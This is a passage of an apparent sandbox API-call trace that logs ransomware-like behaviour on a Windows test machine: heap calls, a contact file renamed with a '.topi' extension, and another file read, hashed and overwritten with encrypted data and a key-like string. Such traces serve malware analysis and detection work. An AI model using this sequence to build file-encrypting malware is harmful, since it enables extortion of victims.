lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bc228 | out: hHeap=0x680000) returned 1 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8dc0 | out: hHeap=0x680000) returned 1 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8df0 | out: hHeap=0x680000) returned 1 [0093.659] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.topi")) returned 1 [0093.660] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned=".ini" [0093.660] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned=".contact" [0093.660] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0093.684] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=1174) returned 1 [0093.684] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0093.687] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x470, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.687] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.177] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.177] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.178] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.178] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.178] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.178] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.178] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.178] GetLastError () returned 0x0 [0094.179] SetLastError (dwErrCode=0x0) [0094.179] GetLastError () returned 0x0 [0094.179] SetLastError (dwErrCode=0x0) [0094.179] GetLastError () returned 0x0 [0094.179] SetLastError (dwErrCode=0x0) [0094.179] GetLastError () returned 0x0 [0094.179] SetLastError (dwErrCode=0x0) [0094.179] GetLastError () returned 0x0 [0094.179] SetLastError (dwErrCode=0x0) [0094.179] GetLastError () returned 0x0 [0094.179] SetLastError (dwErrCode=0x0) [0094.179] GetLastError () returned 0x0 [0094.179] SetLastError (dwErrCode=0x0) [0094.179] GetLastError () returned 0x0 [0094.179] SetLastError (dwErrCode=0x0) [0094.179] GetLastError () returned 0x0 [0094.180] SetLastError (dwErrCode=0x0) [0094.180] GetLastError () returned 0x0 [0094.180] SetLastError (dwErrCode=0x0) [0094.180] GetLastError () returned 0x0 [0094.180] SetLastError (dwErrCode=0x0) [0094.180] GetLastError () returned 0x0 [0094.180] SetLastError (dwErrCode=0x0) [0094.180] GetLastError () returned 0x0 [0094.180] SetLastError (dwErrCode=0x0) [0094.180] GetLastError () returned 0x0 [0094.180] SetLastError (dwErrCode=0x0) [0094.180] GetLastError () returned 0x0 [0094.180] SetLastError (dwErrCode=0x0) [0094.180] GetLastError () returned 0x0 [0094.180] SetLastError (dwErrCode=0x0) [0094.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.180] GetLastError () returned 0x0 [0094.180] SetLastError (dwErrCode=0x0) [0094.180] GetLastError () returned 0x0 [0094.180] SetLastError (dwErrCode=0x0) [0094.181] GetLastError () returned 0x0 [0094.181] SetLastError (dwErrCode=0x0) [0094.181] GetLastError () returned 0x0 [0094.181] SetLastError (dwErrCode=0x0) [0094.181] GetLastError () returned 0x0 [0094.181] SetLastError (dwErrCode=0x0) [0094.181] GetLastError () returned 0x0 [0094.181] SetLastError (dwErrCode=0x0) [0094.181] GetLastError () returned 0x0 [0094.181] SetLastError (dwErrCode=0x0) [0094.181] GetLastError () returned 0x0 [0094.181] SetLastError (dwErrCode=0x0) [0094.181] GetLastError () returned 0x0 [0094.182] SetLastError (dwErrCode=0x0) [0094.182] GetLastError () returned 0x0 [0094.182] SetLastError (dwErrCode=0x0) [0094.182] GetLastError () returned 0x0 [0094.182] SetLastError (dwErrCode=0x0) [0094.182] GetLastError () returned 0x0 [0094.182] SetLastError (dwErrCode=0x0) [0094.182] GetLastError () returned 0x0 [0094.182] SetLastError (dwErrCode=0x0) [0094.182] GetLastError () returned 0x0 [0094.182] SetLastError (dwErrCode=0x0) [0094.182] GetLastError () returned 0x0 [0094.182] SetLastError (dwErrCode=0x0) [0094.182] GetLastError () returned 0x0 [0094.182] SetLastError (dwErrCode=0x0) [0094.182] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.182] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.183] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.183] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.183] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.183] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.183] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4a0) returned 0x31d01f0 [0094.183] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x3193e68 [0094.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x320fab0 [0094.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0094.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175ea0 [0094.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf90 [0094.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3580 [0094.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8cd0 [0094.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8df0 [0094.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8dc0 [0094.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x31ce620 [0094.184] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x31ce620, Size=0x218) returned 0x3165e90 [0094.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d0980 [0094.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8df0 | out: hHeap=0x680000) returned 1 [0094.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8dc0 | out: hHeap=0x680000) returned 1 [0094.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0094.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8dc0 [0094.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d8df0 [0094.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0094.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8dc0 | out: hHeap=0x680000) returned 1 [0094.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8df0 | out: hHeap=0x680000) returned 1 [0094.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0094.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.185] GetCurrentThreadId () returned 0x8c4 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e10d0 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.186] GetCurrentThreadId () returned 0x8c4 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x31bee50 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bee50 | out: hHeap=0x680000) returned 1 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8df0 [0094.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8dc0 [0094.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e08 [0094.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8ee0 [0094.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0094.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8df0 | out: hHeap=0x680000) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8df0 [0094.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x3165e90 [0094.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8df0 | out: hHeap=0x680000) returned 1 [0094.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31bc228 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.189] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bc228 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8ee0 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8dc0 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e08 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.189] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8cd0 | out: hHeap=0x680000) returned 1 [0094.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3580 | out: hHeap=0x680000) returned 1 [0094.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0094.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3193e68 | out: hHeap=0x680000) returned 1 [0094.190] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x491, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb14*=0x491, lpOverlapped=0x0) returned 1 [0094.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.190] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x496, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.190] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.190] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.190] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0094.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.191] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.191] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0094.191] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.191] 